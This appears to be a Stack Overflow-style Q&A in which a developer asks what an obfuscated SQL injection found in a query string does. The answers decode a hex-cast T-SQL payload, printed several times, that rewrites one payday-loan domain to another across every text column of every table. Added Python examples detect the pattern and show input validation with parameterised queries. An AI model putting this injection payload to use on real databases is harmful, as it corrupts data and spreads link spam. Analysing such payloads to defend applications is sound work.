【Question title】: What does it do?
【Posted】: 2013-03-06 10:10:59
【Question】:

I recently found, with the help of SQL Profiler, the cause of a SQL injection in my application:

The cause was this:

SELECT * FROM tbl_posting_job_info where job_posting_id=33131 declare @s varchar(8000) set @s=cast(… 40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000)) exec(@s)

passed as the query string.

So can anyone tell me what the above says?

【Question discussion】:

    Tags: sql sql-injection


    【Answer 1】:

    Exec can execute SQL code passed as a string. So they obfuscate the string as hex character codes to make it less readable to you. Converting it from hex to text gives:

    set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
    

    Formatted version:

    SET ansi_warnings OFF 
    
    DECLARE @T VARCHAR(255), 
            @C VARCHAR(255) 
    DECLARE table_cursor CURSOR FOR 
      SELECT c.table_name, 
             c.column_name 
      FROM   information_schema.columns c, 
             information_schema.tables t 
      WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
             AND c.character_maximum_length > 10 
             AND t.table_name = c.table_name 
             AND t.table_type = 'BASE TABLE' 
    
    OPEN table_cursor 
    
    FETCH next FROM table_cursor INTO @T, @C 
    
    WHILE( @@FETCH_STATUS = 0 ) 
      BEGIN 
          EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
          '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
          '] like ''%adampaydayloans.com%'' ') 
    
          FETCH next FROM table_cursor INTO @T, @C 
      END 
    
    CLOSE table_cursor 
    
    DEALLOCATE table_cursor 
    

    【Discussion】:

    • Will it affect every table with the same query, since multiple tables in the database are affected?
    • @VishalSuthar It will affect all tables, because it iterates over every table in the db as it loops through information_schema.tables
    • @VishalSuthar Not what I said. It will affect every table that has at least one column of type 'nvarchar', 'varchar', 'ntext' or 'text'. Basically it tries to change the domain name of email addresses.
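The hex-cast-then-exec pattern in the question is easy to spot and decode mechanically. The following is an added example, not code from the original answer: a small Python analyser that finds a `cast(0x… as varchar(n)) exec(` construct in a traced statement, decodes the hex the way CAST would, and reports which of the fragments seen in the decoded payload above it contains. The trace line and the shortened payload are constructed for the example.

```python
import binascii
import re

# Pattern used in the injected query on this page: the attacker hides T-SQL as a hex
# literal, casts it to varchar and hands it to exec(). Group 1 captures the hex digits.
HEX_CAST_EXEC = re.compile(
    r"cast\s*\(\s*0x([0-9a-fA-F]+)\s+as\s+n?varchar\s*\(\s*\d+\s*\)\s*\)\s*exec\s*\(",
    re.IGNORECASE,
)

# Fragments present in the decoded payload shown in the answer above (compared lowercase).
# Any two of them together is a strong signal that a mass-UPDATE cursor script was injected.
SUSPICIOUS_FRAGMENTS = (
    "information_schema.columns",
    "declare table_cursor cursor",
    "exec('update [",
    "replace([",
)

def decode_hex_payload(hex_digits: str) -> str:
    """Convert the hex digits of a 0x... literal to text, as CAST(... AS VARCHAR) would."""
    return binascii.unhexlify(hex_digits).decode("latin-1")

def analyse_statement(sql_text: str) -> dict:
    """Return the decoded payload (if any) and which suspicious fragments it contains."""
    m = HEX_CAST_EXEC.search(sql_text)
    if not m:
        return {"obfuscated": False, "decoded": "", "hits": []}
    decoded = decode_hex_payload(m.group(1))
    lowered = decoded.lower()
    hits = [f for f in SUSPICIOUS_FRAGMENTS if f in lowered]
    return {"obfuscated": True, "decoded": decoded, "hits": hits}

# Constructed sample: a shortened stand-in for the page's payload, hex-encoded here so the
# example runs offline without the full 1.6 KB literal from the question.
SAMPLE_PAYLOAD = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
                  "select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c "
                  "EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''a'', ''b'')')")
SAMPLE_TRACE_LINE = (
    "SELECT * FROM tbl_posting_job_info where job_posting_id=33131 "
    "declare @s varchar(8000) set @s=cast(0x"
    + binascii.hexlify(SAMPLE_PAYLOAD.encode("latin-1")).decode()
    + " as varchar(8000)) exec(@s)"
)

if __name__ == "__main__":
    print(analyse_statement(SAMPLE_TRACE_LINE))
```

The same `decode_hex_payload` call applied to the hex literal from the question reproduces the `set ansi_warnings off …` script shown in the answers.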
    【Answer 2】:

    The string is the hex-encoded version of

    set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE (@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    I decoded it using http://home.paulschou.net/tools/xlate/.

    Nicely formatted, the SQL code is as follows:

    SET ansi_warnings OFF 
    
    DECLARE @T VARCHAR(255), 
            @C VARCHAR(255) 
    DECLARE table_cursor CURSOR FOR 
      SELECT c.table_name, 
             c.column_name 
      FROM   information_schema.columns c, 
             information_schema.tables t 
      WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
             AND c.character_maximum_length > 10 
             AND t.table_name = c.table_name 
             AND t.table_type = 'BASE TABLE' 
    
    OPEN table_cursor 
    
    FETCH next FROM table_cursor INTO @T, @C 
    
    WHILE( @@FETCH_STATUS = 0 ) 
      BEGIN 
          EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
          '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
          '] like ''%adampaydayloans.com%'' ') 
    
          FETCH next FROM table_cursor INTO @T, @C 
      END 
    
    CLOSE table_cursor 
    
    DEALLOCATE table_cursor 
    

    【Discussion】:

    • Will it affect multiple tables with the same query, since multiple tables in the database are affected?
    • @VishalSuthar: By the look of it, it could modify every table in the schema.
    【Answer 3】:
    SELECT cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000))

    yields:

    set ansi_warnings off 
    DECLARE @T VARCHAR(255),@C VARCHAR(255) 
    DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from     
    INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t 
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and 
    c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE 
    TABLE' 
    
    OPEN Table_Cursor 
    FETCH NEXT FROM Table_Cursor INTO @T,@C 
    WHILE(@@FETCH_STATUS=0) 
    BEGIN 
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', 
    ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') 
    FETCH NEXT FROM Table_Cursor INTO @T,@C 
    END 
    
    CLOSE Table_Cursor 
    DEALLOCATE Table_Cursor
    

    Essentially, it checks whether the string adampaydayloans.com appears in the tables and replaces it with another value, drewpaydayloans.com

    【Discussion】:

    • Thanks SchmitzIT for the answer!
    【Answer 4】:

    If you run the following query in your database

    select cast(… as varchar(8000))
    

    you will get

    set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
    

    You should validate that job_posting_id is a number before executing the query, so that their code cannot be injected.

    【Discussion】:

    • Thanks Maras for the help!! Yes, I have to validate job_posting_id
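The fix suggested in the answer above, as an added example rather than code from the original thread: the id coming from the query string is accepted only if it is a plain decimal integer, and the lookup binds it as a parameter instead of concatenating it into the statement. The table, the sqlite3 in-memory database and the hostile input value are constructed stand-ins for the SQL Server application in the question.

```python
import re
import sqlite3

def parse_job_posting_id(raw: str) -> int:
    """Accept only a plain decimal integer; reject anything else before it reaches SQL.
    A strict ASCII regex is used rather than str.isdigit(), which also accepts e.g. '²'."""
    raw = raw.strip()
    if not re.fullmatch(r"[0-9]+", raw):
        raise ValueError(f"job_posting_id must be a decimal integer, got {raw!r}")
    return int(raw)

def fetch_posting(conn: sqlite3.Connection, raw_id: str):
    """Look up one job posting: validated integer plus a bound parameter, no string concatenation."""
    job_id = parse_job_posting_id(raw_id)
    cur = conn.execute(
        "SELECT job_posting_id, title FROM tbl_posting_job_info WHERE job_posting_id = ?",
        (job_id,),
    )
    return cur.fetchone()

def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the application's table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_posting_job_info (job_posting_id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO tbl_posting_job_info VALUES (33131, 'Constructed sample posting')")
    return conn

# Constructed stand-in for the query-string value seen in the trace: the real id followed by
# stacked T-SQL (the hex literal here decodes to 'set ansi_warnings off', the payload's prefix).
HOSTILE_INPUT = ("33131 declare @s varchar(8000) set @s=cast("
                 "0x73657420616e73695f7761726e696e6773206f6666 as varchar(8000)) exec(@s)")

def demo() -> tuple:
    """Return (row for the legitimate id, whether the hostile value was rejected)."""
    conn = make_demo_db()
    legitimate_row = fetch_posting(conn, "33131")
    try:
        fetch_posting(conn, HOSTILE_INPUT)
        rejected = False
    except ValueError:
        rejected = True
    return legitimate_row, rejected

if __name__ == "__main__":
    print(demo())
```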
    【Answer 5】:

    Use this:

    http://www.dolcevie.com/js/converter.html

    It looks like the incoming hex turns into this

    set ansi_warnings off 
    DECLARE @T VARCHAR(255),@C VARCHAR(255) 
    DECLARE Table_Cursor CURSOR FOR 
    select c.TABLE_NAME,
           c.COLUMN_NAME 
    from INFORMATION_SCHEMA.columns c, 
    INFORMATION_SCHEMA.tables t 
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') 
    and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name 
    and t.table_type='BASE TABLE' 
    
    
    OPEN Table_Cursor 
    FETCH NEXT 
    FROM Table_Cursor 
    INTO @T,@C 
    
    WHILE(@@FETCH_STATUS=0) 
    BEGIN 
      EXEC(
        'UPDATE ['+@T+'] 
        SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'')
        where ['+@C+'] like ''%adampaydayloans.com%'' 
      ') 
    
      FETCH NEXT FROM Table_Cursor 
      INTO @T,@C 
    END 
    
    CLOSE Table_Cursor 
    DEALLOCATE Table_Cursor
    

    So it looks like some shady payday-loan outfit is trying to change every varchar/text field in the database that contains a link to some competitor so that it points to their own payday loan site instead.

    【Discussion】:
